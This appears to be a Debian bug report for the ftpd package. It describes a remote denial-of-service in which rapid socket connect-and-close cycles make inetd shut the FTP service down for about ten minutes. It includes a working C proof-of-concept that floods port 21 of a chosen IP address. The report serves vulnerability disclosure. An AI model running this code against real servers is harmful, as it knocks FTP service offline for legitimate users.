Package: ftpd Status: install ok installed Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]> Architecture: i386 Version: 0.17-21
I'm currently running Debian testing with a few packages from unstable. I've discovered a vulnerability which would allow a remote denial of service attack in the ftpd program. It is caused by someone rapidly opening a socket, connecting server, then closeing the socket, and I've written a small example which can be examined below. Here's a timeline of what an attack might look like: * program rapidly opens a socket, connect()'s, then closes the socket * inetd redundantly reports: in.ftpd: connect from [host] * inetd, then, reports the message: ftp/tcp server failing (looping), service terminated * existing connections continue to work, however, * since ftpd is down, no new connections can be established * after about ten minutes, ftpd is restarted As promised, here's an example program. This will attempt to use the first arguement as an IP address if one is supplied, otherwise it will use 127.0.0.1. #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int sock; struct sockaddr_in addr; void open_socket() { sock = socket(AF_INET, SOCK_STREAM, 0); if ( connect(sock, (struct sockaddr *)&addr, sizeof (struct sockaddr)) < 0 ) { fprintf(stderr, "Error\n"); close(sock); exit(1); } } int main(int argc, char * argv[]) { char * address = "127.0.0.1"; int port = 21; if (argc == 2) address = argv[1]; addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(address); addr.sin_port = htons(port); int over = 0; printf("Assaulting server\n"); while (over < 100) { open_socket(); close(sock); over++; } return 0; }